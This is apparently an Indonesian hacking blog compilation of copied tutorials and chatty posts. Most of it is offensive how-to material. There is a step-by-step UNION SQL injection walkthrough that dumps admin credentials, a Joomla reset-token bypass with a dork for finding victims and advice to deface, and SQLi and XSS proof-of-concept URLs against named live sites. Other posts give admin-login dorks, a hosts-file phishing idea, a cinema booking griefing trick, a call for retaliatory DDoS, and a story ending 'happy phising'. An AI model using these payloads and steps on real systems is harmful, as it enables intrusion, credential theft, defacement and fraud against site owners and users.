perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.
tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+
from+information_schema.tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+
information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+
information_schema ​.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password)
,6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

---END---
Special Thanks to: N4ck0
Grey Hat Hacker Indonesia

JADOEL TRICKS DEFACE WEBSITE (Joomla)

Tutorial ini sudah tersebar kemana-mana, dan sudah JADOEL, yah, itung-itung nambah database... wkwkwkwk

OK, Tekhnik Deface Web ini dinamakan "Token". Mengapa? karena Token akan membawa kemenangan!

GO TO TUTOR DEH...
1. Cari Mangsa sama om google, dorknya: inurl:/index.php?option=com_user&view=reset&layout=confirm
2. Udah ketemu mangsa misalnya:
www.korban.com/index.php?option=com_user&view=reset&layout=confirm
3. Anda dihadapkan kepada sebuah Form untuk mengisikan "Token", isikan aja single quote (') lalu Lanjoet!!!
4. Jika berhasil, anda akan dihadapkan pada form reset password (Disuruh isi password baru dan mengulangnya), Jika enggak, ada tulisan yang memungkinkan anda salah memasukkan token yang salah, berarti udah dipatch! (Carilah mangsa lain)
5. Masukin aja password yang anda mau... (Terserah)
6. Jika sudah, anda 'mungkin' dihadapkan kepada login form, isikan nama admin lalu password yang tadi anda buat... Kalo enggak, cari aja admin loginnya sendiri...
7. Sudah masuk ke panel nih, ngapain? Lakukan sesuai imajinasi kalian, dan kesadisan anda... (DEFACE kek, apa kek, jadi kakek-kakek kek, dll.)

---END---

Rusuh di Blitzmegaplex lewat Komputer

Effect: Ganti-ganti pesanan seat di Blitzmegaplex, jadi orang yang mau mesen malah udah dipesen, tetapi setengah jam kemudian, seat itu tersedia lagi...

Caranya:
1. Pergi ke www.blitzmegaplex.com
2. Klik "Ticket" di atas (Sejajar sama Home) Lalu muncul window baru
3. Pilih aja terserah bioskopnya, film apa, waktunya apa, tanggal berapa, sesuai kebutuhan, lalu klik Continue
4. Pilih aja 4 seat terserah, lalu pilih continue
5. Dihadapan ada Login form, abaikan saja, trus tutup aja window baru-nya...
6. Ulangi dari step 2 sampe puas
Mau diulang lagi?
Ulanglah 20 menit ato 30 menit kemudian...

Pada saat pengulangan, di step 4, liat deh, seat yang tadi kita pesen masih terpesan/pesenan kita nggak tersedia lagi (karena tadi kita udah pesen)

HAHAHAHA!!!
Cocok dipakai untuk isengin temen anda...

-----END-----
Special Thanks to: Th0r
Inspired by: How to Hack Cinema, same concept but have a different tutorial in www.th0r.info

Hack Lift

Semua system bisa dihack, termasuk LIFT.
LIFT adalah sebuah benda yang besar untuk mengantarkan kita ke setiap lantai dalam gedung... (Menurut Wikipedia ala gw ^_^)

Effect:
Memakai lift tanpa hambatan dari orang lain (langsung ke lantai yg kita tuju tanpa harus berhenti-berhenti) Misalnya:
kita mau ke lantai 10, ada orang pengen ke lantai 4, jika kita lakukan Lift Hacking, Lift langsung ke lantai 10 tanpa berhenti di lantai 4.

Cara:
1. Tekan Buka dan Tutup secara bersamaan
2. Tekan Tutup dan Lantai Tujuan secara bersamaan

Silahkan pilih dari dua cara diatas, tapi INGAT! Itu dilakukan ketika lift sudah mulai berjalan, jangan sampai telat!

WARNING!
---Do it with your own risk!!!---
Misalnya:
- Ada penjaganya, trus kita lakukan Lift Hacking, nanti malah ditangkep
- Ada banyak orang ke lantai yg berbeda-beda, kalo kita lakukan Lift Hacking, nanti malah digebukin Bareng-bareng!
- Liftnya gak bisa dihack, pake cara Lift Hacking, error, berhenti, gak bisa dibuka, MASALAH BESAR!!!

---END---
By: Aswin Zuckerberg (Facebook)
Sumber: Group Hacker Indonesia di Facebook

Times Up, Rapidshare!!! (Rapidshare Hacking)

---1|\|7R0|)U(710|\|---
Rapidshare adalah situs Sharing File antar user dunia maya... Taukah anda bahwa kita bisa mendapat hak Premium Account dengan Free User?


Ini adalah ilmu hacking dari SpyroKiD, Hehehe....

Effect:
Kalo download di Rapidshare, kalo pake Free User kita gak perlu nunggu beberapa puluh detik dulu... (Kayak pake Premium Account)


Tutor:
1. Copas link Download Rapidshare (terserah, yg pengen kamu download)
2. Klik Free User
3. Abaikan countdown untuk memperlihatkan tombol download
4. HAPUUUSSS Semua URL di Address Bar
5. Copas code ini ke Address Bar: javascript:alert(c=0)
6. Klik Enter!!!
7. Jangan panik jika ada alert, itu tanda-tanda kemenangan!

Nah! Langsung dah keliatan tuh Link Download...


---END---
Sumber: www.spyrozone.net
Penulis: SpyroKiD

Hmm, situs Deddy Corbuzier udah direpair toh...

Setelah buka Jatimcrew, saya buka situs Om Deddy Corbuzier, en Ternyata udah direpair toh!!!

Hahaha, ternyata gak ada apa-apanya di situs itu, lainnya cuma ke web laen...

NEW TARGET: blog para seleb, siapa tau bisa dihack... Ato... jangan-jangan Reselling Hosting dari blogger.com... (NGERI)

---END---

Jatimcrew is Back!

Siang-siang abis bikin PR (Belom selesai), Nyalain komputer online lagi... trus buka Jatimcrew, Eeeh, udah bisa diakses, Selamat yee...
---AYO KITA BALAS PERBUATAN MALINGSHIT---


--END--

Buat dan Delete Folder dengan VB aka Visual Basic

Ini ada beberapa Syntax untuk membuat atau delete Folder:
1. Delete Folder: (Hanya untuk Folder yg kosong)
RmDir (”c:\FolderTest”)
2. Delete ISI Folder (Hapusin dulu data-data yg ada di folder...)
Kill “c:\FolderTest\*.*”
3. Buat Folder:
MkDir (”c:\FolderTest”)

SELAMAT MENCOBA

Sumber: http://pondokindah.wordpress.com/
Penulis: Sarach

Jatimcrew kena DDoS sama Dark Malaysia (Dari seminggu lalu)

TURUT BERDUKA CITA atas ke-DDoS-nya Jatimcrew... Padahal saya sering kesana tanpa Register, cari-cari ilmu gitu loh... (Tapi mungkin seringan ke HC sama Spyrozone... ^_^)
Bener-bener tuh Malingsial... (Tapi mungkin karena Jatimcrew juga yang suka hack Maling tersebut, tapi (katanya) belum ada penangkal DDoS...
Yep, intinya, jika anda sekalian mau DiDiOeS-sin si Dark Malaysia itu, kita tetapin kapan, jam berapa, detik berapa, mili detik berapa (???)
Bagi warga Jaticrew yang kena imbasnya, kalian bisa susun strategi disini (Ceileehh... Strategi...)
Yaudah, pokok'e, /me turut berduka cita aja...


---END---

Windows Hacking: Manipulasi Localhost

Anda pasti tau tentang Localhost aka 127.0.0.1 (GAK TAU??? Gak apa-apa... Localhost itu adalah Jaringan/Alamat/IP/Local Web Directory Komputer kita sendiri... Jadi, kalo kita DDoS ke 127.0.0.1 namanya BUNUH DIRI!!!)
Nah, kita akan membuat Domain .com gratis untuk localhost kita (tapi KAYAKNYA cuma buat kompi kita sendiri deh...)


Tutorial-nye...
Buka Windows Explorer, lalu ketik di address bar: C:\WINDOWS\system32\drivers\etc
Buka file hosts dengan text editor dan anda akan melihat text seperti ini:
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host


Paham penggunaan file ini?


Lalu, setelah itu dan sesudah itu, Kini, kita tambahkan baris baru dibawahnya seperti ini:
127.0.0.1 localhost klik-bca.com www.klik-bca.com
Lalu, setelah itu dan sesudah itu, Kini, kita ke web browser kita, lalu ketik di address bar, www.klik-bca.com, yang keluar bukannya klik-bca.com malah web directory lokal kita...


Jadi, intinye, kita bisa merubah domain web direktori lokal kita dengan domain lain, seperti kalo mau (pura-pura) deface/DDoS situs, kita masukin aja www.google.com di warnet... (hehehehe!!!) dan juga kita bisa phising dengan menghantarkan dari Facebook ke web direktori lokal komputer... Pokok'e terserah deh, be creative...


---END---
Sumber: www.spyrozone.net
Penulis Asli: SpyroKiD

Cara Kerja KumpulBlogger (Mungkin semua situs setipe KumpulBlogger juga pake system kayak gini...)

OK, /me mau share sesuatu yang (mungkin) berharga bagi kalian!!!
Gini, saya kan liat di URL Ads-nya kumpulblogger tidak sama dengan situs yang diadvertise (beneran, kayaknya mirip Adsense...) Misalnya: Link yang di-iklankan: www.google.com, kalo misalnya cursor kitaarahin ke linknya, dibawah biasanya dikasih tau addressnya apa... (liat gak di KIRI-BAWAH???) Nah, addressnya begini: www.kumpulblogger.com/lempar.php?222/...... (dan embel-embel lainnya/Nomor ID/UID, dll. Misalnya: www.kumpulblogger.com/lempar.php?222/222/222/#222
Nah, di address www.kumpulblogger.com/lempar.php?222/222/222/#222, Terdapat script untuk menambah poin orang yang pasang script kumpulblogger + Redirector ke Link yang di-iklankan!!!

Dan yang ini nih yang bikin gw sebel:
KumpulBlogger itu bukan PPC (Pay Per Click) tapi PPUC (Pay Per Unique Click)
Pay Per Unique Click itu adalah mendapatkan uang hasil klik ads 1 orang!!! (Mungkin juga satu IP)
Jadi, kalo ada orang yang mengklik lebih dari 100 juta kali klik dalam satu hari tetep aja DI-ITUNG SATU KALI!!! (Sebel gak tuh???)

OK, saya sudah sharing semua yang saya tau tentang KumpulBlogger, dan kayaknya KumpulBlogger juga memonitor anggotanya deh, buktinya:
Setelah |)347|-| 807 klik ads-ku berturut-turut dan dia kasih tau tentang apa yang diperbuatnya dan saya juga mengaku di "Cerita Seorang Darkness Hacker" langsung esoknya saya udah gak dianggep!!!
Jadi, intinya, Security KumpulBlogger gak cuma sebatas Bot doank... tapi dia juga memonitor secara manual... (patut ditiru, teman-teman) Tapi ingat: "Nothing is Secure" bisa saja KumpulBlogger akan dihack juga... (sama kayak takdir Facebook...)

---END OF POSTING---

Bugs masih anget!!! (Barusan diupdate...) XSS + SQLi

OK, bug ini adalah bug yang ada di Gyro v.5.0 dan ditemukan oleh OoN_Boy
Kita akan langsung liat apa bugsnya...

Google Dork:
"powered by Gyro V5.0"

Exploit:
http://localhost/home?op=cat&cid=[sql]
http://localhost/home?op=cat&cid=[Xss]

POC:
http://www.vansda.ca/home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--
http://www.vansda.ca/home?op=cat&cid=29"BAscriptBalert(123456)A/scriptB
http://www.phpmath.com/home?op=cat&cid=29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.phpmath.com/home?op=cat&cid=29"BAscriptBalert(123456)A/scriptB

INGET!
AB = <>
Copased from milw0rm.com
OoN_Boy juga meninggalkan pesan-pesan terakhir kepada (Greetz maksudnya...): Antisecurity[dot]Org www.BatamHacker.or.id www.MainHack.com www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^

---END---
Special Thanks to OoN_Boy
Sumber: www.milw0rm.com

HOAX Virtual Card for you

Ditemukan sebuah "HOAX" (Berita Bohong) yang menyatakan tentang virus yang menyebar dari Email yang bersubyek "Virtual Card For You"
Pernah dapet HOAX itu? Saya katakan sekali lagi LANGSUNG HAPUS!!! JANGAN DISEBARKAN, Jika anda tidak mau dikatain "HOAX-er"
HOAX-nya seperti ini:
VIRUS BARU

BACALAH DENGAN SEGERA, KIRIMKANLAH PESAN INI KE SEMUA NAMA DALAM DAFTAR ALAMAT ANDA.

VIRUS PALING JAHAT DARI YANG PERNAH ADA

Sebuah virus baru sudah ditemukan, dan digolongkan oleh Microsoft sebagai yang paling merusak!Virus itu baru ditemukan pada hari Minggu siang yang lalu oleh McAfee, dan belum ditemukan vaksin untuk mengalahkannya.

Virus ini merusak Zero dari Sektor hard disc, yang menyimpan fungsi informasi-informasi terpenting. Virus ini berjalan sebagai berikut :

1. secara otomatis virus ini akan terkirim ke semua nama dalam daftar alamat anda dengan judul “Sebuah Kartu Untuk Anda” ( Une Carte Pour Vous , atau A Card For You )

2. begitu kartu virtual itu terbuka, virus itu akan membekukan komputer sehingga penggunanya harus memulainya kembali; kalau anda menekan CTRL+ALT+DEL atau perintah untuk restart, virus itu akan merusak Zero dari Sektor Boot hard disk, sehingga hard disk akan rusak secara permanen.

Menurut CNN, virus itu dalam beberapa jam sudah menimbulkan kepanikan di New York . Peringatan ini telah diterima oleh pegawai Microsoft sendiri. Jangan membuka e-mail dengan judul “Sebuah kartu virtual untuk Anda” ( Une Carte Virtuelle Pour Vous atau A Virtual Card For You ).

Kirimkan pesan ini kepada semua teman anda. Saya rasa bahwa sebagian besar orang, seperti saya sendiri, lebih suka mendapat peringatan ini 25 kali daripada tidak sama sekali.

AWAS!!!
Jangan terima kontak ” pti_bout_de_ chou @hotmail.com “. Ini virus yang akan memformat komputer anda. Kirimkan pesan ini ke semua orang yang ada di dalam daftar alamat anda.

Kalau anda tidak melakukannya dan salah seorang teman anda memasukkannya dalam daftar alamatnya, komputer anda juga akan terkena
-----------------------
Yang tulisan merah itu adalah bukti bahwa ini adalah HOAX!
So, HATI-HATI TEMAN-TEMAN!!! Janganlah percaya yang namanya HOAX!!!
Oke...
Oke...
Oke...
Janji yaa... (Soalnya saya gak mau dapet HOAX... dan kayaknya aku kena imbas orang gila yang kena virus yang bernama virut, jadinya saya dapet spam, spam, and spam...)

---END---
Sumber: Kumpulan HOAX

Lebih jauh tentang diriku...

AWAS! JIKA ANDA TIDAK MEMBACANYA LANGSUNG DI BLOGNYA, ANDA AKAN SALAH PAHAM!!!
Ahaha... ngepost beginian, kayak gak ada kerjaan aja...
Tapi emang gw tukang nulis sih... (Copas lebih sering untuk tutor... ^_^)
ok,yang ingin mengenalku lebih jauh, tunggu bentar...


bentar....




bentar.....



bentar.....



bentar lagi....




sedikit lagi......






BERSAMBUNG...

Hahahahahaha!!!
Nih, saya bercerita tentang diriku...
Jadi, saya dulu (kira-kira kelas 3 SD) mengenal yang Namanya "Hacking" tapi dulu gambaran saya pada waktu itu tentang hacking adalah "Takeover", "Main Bobol", "Nyuri Passowrd", dll. Tapi saya pada saat itu gak hack-hackan karena gak ada internet... ^_^ baru tuh, pas kelas 6, saya maen mig33 dan banyak temen-temen sepermainan dota, sampe om-om pun maen...
Suatu hari, mau buka mig33, eh, takut pulsa membengkak, yaudah, buka google, search bokep hacking, nah, keluar tuh "mig33 tricks" ternyata pada ngakalin bot/engine-nya mig33 (dapet emoticons lah, dll.) nah, trus saya search yang lebih bermutu lagi yaitu: "friendster hacking" HAHAHAHAHA!!! Lalu, saya sangaaat tertarik untuk hacking, jadi di warnet apa lagi kalo bukan cari-cari tutorial, refrensi, dll. (Udah masuk dunia per-hackingan) Tapi pas itu tujuannya lain... Yaitu iseng, dll.
Keadaan saat itu: Saya pindah rumah
Lalu aku beli buku "Tekhnik Hacking and Overlay Friendster" untuk belajar Hacking Friendster, dan ternyata, "ADMINNYA FRIENDSTER SUDAH NGEPATCH SECURITY-NYA!!! CODE-CODE DI BUKU ITU TIDAK BERGUNA! TIDAK BERGUNA!!!" Tapi ternyata berguna juga...
Saya bisa belajar HTML dasar, JavaScript Dasar, XSS, CSRF, dll.
Hahahaha... Saya-pun mendalami ilmu perhackingan karena dirumahku sudah ada akses Internet (indomie telor kornet HURRAY!!!)
Hyahahahahahaha... pas itu masih "Black" suka pake soceng malah dapet korban phising orang laen, dibuka atu-atu tapi gak saya apa-apain (buat ape juga??? gak berguna sama sekali!!)
Trus pekerjaan yang paling gak berguna adalah: Pake Opera, edit source code page, and save... Jadinya saya cuman edit-edit Gak Jelas doank, gak maksud, perubahannya cuma di kompi saya doank...

Nah, masa-masa kelabu pun selesai...
Udah masuk ke Hacker Center (tapi gak pernah regist), Echo, Yogyafree, Jasakom, Indonesian Coder, dll (dan gak pernah regist semua...) kecuali Fasthacker (saya udah regist, cari aja namanya X_Oblivion) membuat mata saya terbuka tentang Hacking...
Ternyata Hacking itu baik tidak ada yang jahat, tapi kalo menurut hukum TETEP jahat (iyalah, soalnya kan ILLEGAL OPERATIONS)
Yep, semuannya berlalu sampe sekarang...................

OK, itulah cerita panjang dari seorang ne0 d4rk fl00d3r

---END---

Cara Seorang Hacker: Mencari Admin Login tanpa mantra... (Iye, tapi pake google...)

Wah... Postingan baru nih...
Biasanya kita abis SQLi langsyung ke admin login ato udah login, tapi kalo belom login ke admin, gak tau dimana admin loginnya...
TENANGLAH!!!
Kita bisa mendapatkannya hanya lewat Web Browser dan Google!!!
Caranya begini:
- Buka google (tapi jangan buka celana... hehehe...)
- Search dengan dork (Dork tau gak? Dork itu Keyword):
site:webtarget.com inurl:admin
site:webtarget.com intitle:Admin Login
site:webtarget.com intext:Admin Login
dll.

Udah dapet kalo pake dork diatas? berarti anda sudah menemukan admin login tersebut!!!
OK, kalo belum, coba kamu buat sendiri dorknya... (hehehe)

---END OF CONTENT---

Penyempurnaan Restart Code pada Symbian (untuk kebaikan)

Ada yang tau Mig33? Mig33 dipopulerkan oleh IM3 (itu lhoo yang chatting itu...)
Nah, saya akan mengajarkan anda tentang cara restart code pada Symbian yang kemarin yaitu [TAB]
OK, kita hanya perlu web browser dan notepad...

Regist aja dulu kalo gak punya Mig33, kalo udah punya mig33 login dikomputer yee....
OK, saya akan membuat Dongeng lagi:

Disebuah Room di Mig33 yang bernama "Seks Bebas" (soalnya itu tuh room yang paling rame) Bilanglah si pelaku bernama ne0
Seks Bebas: ne0 is entered
Seks Bebas: Currently in room: ne0, --aaaaa--, wkwkwk, leo_macan, beauty_girlz, meta, devilzman, ml yuks, ajigile
--aaaaa--: Wew...
wkwkwk: Napa sih ni org?
leo_macan: biasa...
ne0: halo....
meta: aaaaa lagi stres
--aaaaa--: gw punya hape nokia baru
meta: symbian?
--aaaaa--: iye...
ne0: gw ol di-kompi
meta: swt
devilzman: ml-an yuk
ajigile: hape gw juga nokia
devilzman: gw juga symbian, tapi BTW, ML-AN YUKS!
ml yuks: wot?
meta: dodol
ne0: koq ngmng gk nyambung???
Seks Bebas: yo_attack has entered
ml yuks: gw blg "APA?"
meta: lw dodol!
leo_macan: si meta bukannya juga symbian juga?

---Ini bukan dalam chat:---
Wah, banyak orang tercela nih disini, kalo mereka udah ngacauin room tinggal gw TAB!
---Back to chat---

yo_attack: meta jelek!
meta: hp gw bukan symbian dodol!
yo_attack: hp gw yg symbian...
leo_macan: ajigile! lw ngapaen?
wkwkwk: dia lagi ml
ajigile: wena'e! gw lgi kesepian...
yo_attack: o yeah?
--aaaaa--: sori, sapa yg cari gw? tdi gw bru k wc...
--aaaaa--: leo, lw manggil gw?
leo_macan: GE-ER!

---
Mulai rusuh...
---

yo_attack: ajigile udah gile beneran yaa?
ajigile: ANJRID U!!!
leo_macan: H
leo_macan: A
leo_macan: H
leo_macan: A
Seks Bebas: ajigile start to kick leo_macan, 3 wotes required
yo_attack: lw mau dikick leo!
ne0: wele"
leo_macan: AAAAA!!!
ne0: udah gila yaa semuanya????
Seks Bebas: vote for kick leo_macan is failed
ajigile: ini giliran loe ne0!!!

---
Gw dah mau dikick! gw langsung buka notepad, tulis "Sudahlah![tab][tab]" lalu copy siap-siap paste ke mig33
---

Seks Bebas: ajigile start to kick ne0, 3 vote required
ne0: Sudahlah!
Seks Bebas: ajigile has left
Seks Bebas: ml_yuks has left
Seks Bebas: meta has left
Seks Bebas: --aaaaa-- has left
Seks Bebas: yo_attack has left
Seks Bebas: devilzman has left
Seks Bebas: wkwkwk has left
Seks Bebas: beauty_girlz has left
Seks Bebas: leo_macan has left

---
BUSEET! ternyata mereka semua pake symbian??? dasar fitnah!
---


Itulah cara hacking yang baik dan benar, udah tau kan konsepnya???
OK, Gutbai!!!

Bug Joomla Component

Bug ditemukan oleh 599eme Man pada Jomla Component:
- SQLi:
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20union%20all%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25,26,27,28,29

- Blind SQLi:
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2%20and%201=2 => False
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2%20and%201=1 => True

http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2 and substring(@@version,1,1)=4 => False
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2 and substring(@@version,1,1)=5 => True

---3|\||)---

Chat Facebook tanpa buka situs Facebooknya

OK, saya lagi jalan-jalan ke Palembang Hacker Link nih, ketemu sama trik ini (ini sih bukan hacking, tapi Social Networking...) Yaa, itung-itung buat jatah nasi (lhoo? koq gak nyambung...) itung-itung kita bisa pake untuk kemudian hari... (kalo speed lagi lemotz...)
OK, inilah toolnya: DOWNLOAD DISINI!!!

Nah, tool ini (kayaknya lebih bisa dibilang "software") client untuk FB, kegunaanya adalah untuk chatting, memperbaharui status, dll. (coba sendiri!)

OK, EoP!!!

I'm Surrender!!! SQLi Tutorial banyak banget menurut mpu Marezzi!!! (AKU MENYERAAAHHH!!!)

Kalo translate artikel dari milw0rm, trus panjang lagi itu saaaaaaaaaangaaaat susah dan saaaaaaaangaaaaaaat lama... Emank banyak sih artikel tentang SQLi...

OK deh, silahkan baca sendiri di SINI

AKU BERJANJI AKAN MEMBUAT ARTIKEL SQL INJECTION YANG LEBIH GAMPANG!

Peace...
ne0 d4rk fl00d3r

Bagi orang yang gak bangga sama Hacker yang ngehack situs-situs pas HUT RI, baca ini!

Liat dari Kaskus
Saya sebenernya setuju-setuju aja ngedeface situs Maling pada saat itu, tetapi kalo situs negara sendiri, mungkin ada yang berpikiran begini:
"Mencerdaskan Kehidupan bangsa di Dunia Maya untuk menyadarkan mereka tentang bugs tersebut"
Saya sih setuju kalo begitu!
Kalo begini:
"Iseng"
-__- Saya gak setuju banget! Sebagai White Hat, saya gak terima! (Halah, apa sih?)
Jadi, bagi orang awam yang gak tau apa-apa, cobalah untuk tidak berprasangka buruk dulu, siapa tau mereka beralasan seperti alasan pertama...
r36r4|)5.
ne0 d4rk fl00d3r

Ini adalah lanjutan dari Stupid Phising yang diceritakan bahwa Adi di-phish oleh Joe Cracker dan Facebook-nya di-deactive.
OK, inilah kelanjutannya:

Cerita ini hanyalah Fiksi belaka, jika ada kesamaan tokoh, mohon orang itu diceburkan kedalam kolam yang penuh dengan buaya lapar dan tidak cacat dan Karnivora! dan Rumahnya juga harus dijadikan sebagai penyembahan berhala, Kenapa? karena dicerita ini tidak ada Buaya Karnivora dan penyembahan berhala.

Stupid Phising
Revolution

Suatu Hari, Adi, seorang yang sudah di-"alert" oleh Joe Cracker pergi ke rumah pamannya yang seorang Hacker, Adi sudah tau kalau pamannya tidak akan crack dia, 1000000000%
Disana, dia juga mengajak temannya yang bernama James untuk diajarin tentang Facebookan-Facebookin, mereka diajarin tentang tools buat memberikan notifications ke 1000 orang, dll.
Selesai ke rumah pamannya, mereka-pun pulang dengan selamat, sehat, sentausa, dan bahagia selamanya (gak nyambung)
Esoknya, Adi di-add oleh Pamannya, lalu sesudah itu, Adi dan Pamannya chatting:
KETERANGAN: kalimat didalam [ dan ] adalah komentar dari penulis (ne0 d4rk fl00d3r)

Adi: Hai paman...
Paman: Hai...
Adi: Paman punya trik baru gak?
Paman: So pasti ada... [ini orang paman-paman baek-baek apa anak band?]
Adi: Apa tuh??? [Penasaran banget kayaknya...]
Paman: Hack account punya temen kamu. ini beneran lho, paman udah nyoba ke FB-nya James dapet passwordnya...
Adi: Apa passwordnya? [DASAR ANAK MAU NGEHACK!]
Paman: Eits! no,no,no... [Ini paman apa tante-tante sih??]
Adi: YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHHHHHH [Ni anak malah ngeflood, goblok...]
Paman: Kamu pake aja sendiri...
Adi: Gimana caranya? [Adi udah yakin kalo pamannya gak bakal ngehack dia]
Paman: Tunggu Bentar...

Si paman mau browse bentar document txt-nya

Paman: INI DIA!
Adi: GIMANA? GIMANA? GIMANA?

Paman itu mencopas filenya

Paman: Taukah kamu bahwa di Facebook ada superuser yang bernama password-master? password-master ini akan kasih tau anda password lawan anda yang anda masukkan secara otomatis, Facebook Bot yang bernama password-master itu akan merespon dan mengirimkan password target, caranya adalah: kirimkan pesan ini pada password-master: Subject: PASSWORD Pesan: I'm an Admin of the Facebook, password-master please GET_METHOD_FAST_(email target)_VERIFICATION_NO_GET_USER_(email kamu)_FAST_PASSWORD_(password kamu)_GET_ATTACK
Paman: Setelah 2 Hari, kamu akan mendapat balasan dari superuser itu berisi password seperti ini: PASS_GET_METHOD_USER_GET_METHOD_(email korban)_(password korban)
Adi: Wah, aku mau coba sekarang!
Paman: Tapi inget, Do It with your own risk!

Langsung Adi copas dan isikan beberapa tempat untuk mengisi password, email, dll. lalu kirimkan ke superuser itu...

ESOKNYA................................... (WOY! UDAH! TITIK-NYA SAMAPI DISITU AJA! STOP! STOOOOOOOP!!!)

Adi buka facebook lagi tapi gak bisa, ternyata sudah dideactive! lalu diemailnya ditulis: Kamu dihack! hahahahahahahahahaha!!!!
Lalu Adi telepon Pamannya dan berkata: "AAAAAA PAMAN JAHAT! PAMAN HACK AKU KAN???????????" lalu Pamannya berkata: "Bukan, bukan paman yang melakukannya...." Lalu Adi berkata "Bohong, Paman Pembohong, PAMAN BOHONG!!!!!!!"

Esoknya lagi, Pamannya telepon ke bapak'e si Adi kalo tekankan dia bahwa pamannya nggak ngehack FB-nya Adi...

Lalu Adi-pun sadar bahwa Pamanya gak bakal ngehack dia...

Pamannya kebetulan kan seorang hacker, jadi dia bisa melacak IP Address si Paman Gadungan, setelah ditelusuri dan mengerahkan seluruh preman dari tanah abang sampai Real Address-nya, dia pun ketauan bahwa pelakunya adalah James!

Adi-pun memukul James, lalu James bilang "Apa Sih???", Adi ngomong "Loe udah ngehack gw!" BUAAAAAGH!!!! Adi-pun memukul lagi, Paman dan Ayahnya si Adi malah liatin sambil kayak main PS (Tangannya lagi kayak megang stik PS dan kayak mencet-mencet tombol PS) Memang Ayah dan Paman yang tidak sayang anak...
Teruskan bertarungnya: Adi memukul dan mendamage 300 ke James, lalu James menendang Adi dan mendamage Adi 280, lalu Adi menyundul James tetapi miss! karena James menghindar, lalu terjatuh dan James terdamage 5, karena James kestun, Adi-pun bisa melancarkan jurus terakhir, kerahkan preman-preman tanah abang! lalu semuanya mendamage James 999999999 Damage! dan...

Adi Just pwned James head! 000 Gold split!
Adi just drew Pers Blat!
James is left the game!

---GAME OVER!!!---

James pun menyerah...
Dia kasih account FB-nya Adi lagi...

Dan Adi-pun pulang dengan perasaan senang dan bahagia selamanya (perasaan ini bukan dongeng anak kecil deh...)
----------------END OF CERITA------------------------
Nah, udah tau kan konsep phising-nya?
OK, End of Postingan
Nah, happy phising!

Free Domain Box Hacking!

Maaf bagi orang-orang yang menantikan SQLi 3, tetapi kita selingi yang ringan-ringan dulu yaa...
OK, saya sebenernya ingin sekali mendapatkan free domain dot com, tapi bayar semua, (males banget...) Ini demi kalina semua lhoo, supaya gak perlu .co.cc tapi udah .com (biar nanti orang-orang gak kayak gini:
Temen: Kamu buka apaan jadi pinter hacking?
Anda: Darkness Hacker
Temen: Address-nya apa?
Anda: www.darknezzhacker.co.cc
Temen: Masih .co.cc? ahh, gak jaman, pasti adminnya kere...
DDUUUUAAAAAAAAAARRRRR!!!!)
Ahaahahahahaha! Kita coba Free Domain Box (yang katanya systemnya gak bisa dibo'ongin) Yaitu saya beri nama "Hacking under Proxies" (YAIYALAH!)

Jadi begini Efeknya:
Kamu bisa merefer diri kamu sendiri berkali-kali sehingga kamu bisa dapet points

Konsep:
Merefer diri sendiri berulang-ulang kali

Sebenernya gak bisa dapet point... -__- Tapi kan bisa jadi bahan pelajaran bagi kalian semua.
LET'Z GO!!!
Persiapan:
- Beberapa Proxies
- Foxy Proxy biar lebih gampang (Mozilla Serigala Api ONLY!)
- Punya account untuk direfer
- Web Browser
- Notepad
- Jiwa
- Proxies (Perasaan udah 2 kali "Proxies" ditulis...)

Tutorial:
1. Masuk ke Free Domains Box, lalu login, lalu klik Refer other people
2. Copas Refer link yang ada signup-nya (yg bawah) ke Notepad
